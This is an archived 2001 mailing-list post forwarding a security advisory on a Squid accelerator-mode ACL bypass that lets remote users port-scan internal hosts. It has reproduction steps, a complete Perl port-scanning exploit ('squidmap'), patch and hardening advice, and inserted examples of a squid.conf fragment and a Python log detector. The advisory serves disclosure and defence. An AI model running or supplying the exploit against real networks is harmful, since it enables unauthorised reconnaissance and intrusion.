[squid-users] Squid security alert

From: <Tom.Williams@dont-contact.us>
Date: Tue, 24 Jul 2001 13:24:45 -0700

I got this e-mail message and thought you guys would be interested:

Subject: [UNIX] Squid HTTPd Acceleration ACL Bug Enables Port Scanning
Date: Tue, 24 Jul 2001 11:33:32 -0700 (PDT)
From: support@securiteam.com
To: list@securiteam.com

The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com

  Squid HTTPd Acceleration ACL Bug Enables Port Scanning
------------------------------------------------------------------------

SUMMARY

 <http://www.squid-cache.org> Squid is a high-performance proxy-caching
server for web clients, supporting FTP, gopher, and HTTP data objects.
When Squid has been set up as an HTTPd accelerator (reverse proxy), remote
attackers can misuse it as an open proxy and scan ports on the local
network through it.

DETAILS

Vulnerable systems:
Squid version 2.3STABLE3
Squid version 2.3STABLE4 unpatched
RedHat 7.0

Immune systems:
RedHat version 6.2
RedHat version 7.1
Debian version 2.2
Debian version 2.4

Squid has a known bug in 2.3STABLE4 which ignores ACLs in httpd_accel
mode. Note that this applies only when httpd_accel_host is set and
httpd_accel_with_proxy is off. This is not the default configuration,
so an installation is not vulnerable unless these configuration changes
have been made.

Because the access controls are never consulted for accelerated requests,
any client can ask the proxy to connect to an arbitrary host and port,
which turns the proxy into a port scanner of whatever network it can reach
and potentially lets remote attackers go on to compromise machines behind
a Squid set up this way.

Steps to reproduce:
1. Set Squid to httpd_accel mode, with a particular httpd_accel_host and
strict ACLs that should deny everything else.

2. export http_proxy="http://squid-server:port"

3. Run lynx http://victim:port/

You will get an HTTP 200 code if the port is open, and sometimes a banner
in the response if a service (SSH, SMTP) is active on it.
The correct behaviour would be access denied (403).
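The following squid.conf fragment is an added illustration, not taken from the advisory or from the Squid distribution: it shows the accelerator configuration the advisory describes, together with the ACLs an administrator would expect to confine the proxy to the origin server. The origin address 192.0.2.10 and the port numbers are assumptions for the example.

```conf
# squid.conf fragment (Squid 2.3 directives) - reverse proxy for one origin
http_port 80
httpd_accel_host 192.0.2.10          # assumption: the origin web server
httpd_accel_port 80
httpd_accel_with_proxy off           # the combination the advisory describes

# Intended policy: only the origin server, only on its web port.
acl all src 0.0.0.0/0.0.0.0
acl origin dst 192.0.2.10/255.255.255.255
acl origin_port port 80
http_access allow origin origin_port
http_access deny all
```

On an unpatched 2.3STABLE4 running in this mode the http_access rules above are never evaluated for accelerated requests, so a request for http://victim:22/ is still forwarded to victim:22 and the "deny all" line gives no protection. The ACLs are still worth keeping (they are what a patched Squid enforces), but the patch is the fix, and a packet filter on the proxy host that only permits outbound connections to 192.0.2.10:80 is the independent safety net the advisory recommends.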

General information:
Proxies have often been used to anonymise attacks on HTTP, but as more
sites use reverse proxies to distribute their network load and balance
requests, there is the added possibility that malicious users could gain
access to internal hosts via these proxies.

Solution:
The Squid developers are aware of this bug and have a patch on their site.

RedHat, Immunix and others have been notified, and updated packages are
expected later today.

Consider using additional security measures such as a Squid redirector,
packet filtering on the proxy host, etc., so that the proxy cannot reach
anything but the origin server even if its ACLs are bypassed.
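A proxy abused this way leaves a distinctive trail in Squid's access.log: one client reaching many different host:port pairs that the accelerator was never meant to serve. The script below is an added detection example, not part of the advisory or of Squid; it parses Squid's native access.log format and reports clients that touched more than a threshold of off-target destinations. The log lines are constructed, and the accelerated destinations (www.example.com and 192.0.2.10 on port 80) and the threshold are assumptions for the demo.

```python
"""Flag clients that used a Squid accelerator to reach many host:port pairs.

Added example for this page (not from the advisory or from Squid).  It
parses Squid's native access.log format and reports any client that
reached more than `threshold` distinct destinations outside the set the
accelerator is supposed to front.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample lines in Squid native log format (not real traffic):
# timestamp elapsed client action/status bytes method URL ident hierarchy/peer type
SAMPLE_LOG = """\
995998485.123    45 198.51.100.7 TCP_MISS/200 312 GET http://www.example.com/ - DIRECT/192.0.2.10 text/html
995998486.001    12 203.0.113.9 TCP_MISS/200 0 GET http://192.0.2.20:22/ - DIRECT/192.0.2.20 -
995998486.020    11 203.0.113.9 TCP_MISS/200 0 GET http://192.0.2.20:25/ - DIRECT/192.0.2.20 -
995998486.041   500 203.0.113.9 TCP_MISS/503 1122 GET http://192.0.2.20:23/ - DIRECT/192.0.2.20 text/html
995998486.060    10 203.0.113.9 TCP_MISS/200 0 GET http://192.0.2.20:110/ - DIRECT/192.0.2.20 -
995998486.080    10 203.0.113.9 TCP_MISS/200 0 GET http://192.0.2.20:143/ - DIRECT/192.0.2.20 -
995998486.100    10 203.0.113.9 TCP_MISS/200 0 CONNECT 192.0.2.20:3306 - DIRECT/192.0.2.20 -
995998487.300    40 198.51.100.7 TCP_HIT/200 8812 GET http://www.example.com/index.html - NONE/- text/html
"""

LOG_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<action>[A-Z_]+)/(?P<status>\d{3})\s+(?P<bytes>\d+)\s+"
    r"(?P<method>[A-Z]+)\s+(?P<url>\S+)"
)

# Assumption: the only destinations this accelerator is meant to reach.
ACCEL_DESTS = {("www.example.com", 80), ("192.0.2.10", 80)}


def destination(method, url):
    """Return the (host, port) the proxy was asked to reach, or None."""
    if method == "CONNECT":
        # CONNECT carries a bare host:port rather than a URL.
        host, sep, port = url.rpartition(":")
        if not sep or not port.isdigit():
            return None
        return host, int(port)
    parts = urlsplit(url)
    if not parts.hostname:
        return None
    try:
        port = parts.port
    except ValueError:  # non-numeric or out-of-range port in the URL
        return None
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    return parts.hostname, port


def parse_line(line):
    """Parse one native-format access.log line into a dict, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["dest"] = destination(rec["method"], rec["url"])
    return rec


def find_port_scanners(log_text, threshold=3, allowed=ACCEL_DESTS):
    """Map client -> sorted off-target (host, port) pairs it asked for,
    keeping only clients that exceeded `threshold` distinct pairs.
    Every attempt counts, not just HTTP 200s: a 503 for a closed port is
    still a probe."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["dest"] is None:
            continue
        if rec["dest"] not in allowed:
            seen[rec["client"]].add(rec["dest"])
    return {c: sorted(d) for c, d in seen.items() if len(d) > threshold}


if __name__ == "__main__":
    for client, dests in find_port_scanners(SAMPLE_LOG).items():
        print(f"{client}: {len(dests)} off-target destinations, e.g. {dests[:3]}")
```

The threshold is deliberately low for the sample; on a real accelerator any request for a destination other than the origin is already anomalous, so the more useful tuning knob is the allowed set, which should mirror exactly what httpd_accel_host and httpd_accel_port point at.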

Exploit:
#!/usr/bin/perl
# Author: Paul Nasrat <pnasrat@uk.now.com>
# Date: 7 July 2001
# squidmap: probes TCP ports on the target by asking the (accelerator)
# proxy to connect to them; an HTTP 200 from the proxy means the port
# was reachable.
$|++;
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Std;

getopts('b:P:t:L:H:', \%args);

# A proxy host (-b) and a target (-t) are both required.
unless ($args{b} && $args{t}) {
    print_help();
    exit 0;
}

$low        = $args{L} || 1;
$high       = $args{H} || 8192;
$proxy      = $args{b};
$proxy_port = $args{P} || 80;
$target     = $args{t};

$ua = LWP::UserAgent->new;
$ua->proxy(['http', 'ftp'], "http://$proxy:$proxy_port/");
print "squidmap scanning $target via http://$proxy:$proxy_port\n";
print "Port\tState\t\tService\t\tResponse\n";

for ($port = $low; $port <= $high; $port++) {
    # On a vulnerable accelerator the ACLs are not applied to this request,
    # so the proxy opens a TCP connection to target:port on our behalf.
    $request = HTTP::Request->new('CONNECT', "http://$target:$port");
    my $res = $ua->request($request);
    my $service = getservbyport($port, 'tcp') || '';

    # Check the outcome of the response: success means the port was open.
    if ($res->is_success) {
        print "$port\topen\t\t$service\t\t", $res->content, "\n";
    }
}

sub print_help {
    print 'Usage: squidmap <options> where options:', "\n";
    print '-b host HTTP proxy via host', "\n";
    print '-P ## HTTP proxy port (default: 80)', "\n";
    print '-L ## low end/start of range (default: 1)', "\n";
    print '-H ## high end/end of range (default: 8192)', "\n";
    print '-t host target to attempt to scan', "\n";
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:pnasrat@uk.now.com> Paul
Nasrat.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and
body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.

My DVD Collection
Received on Tue Jul 24 2001 - 14:25:07 MDT

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 17:01:18 MST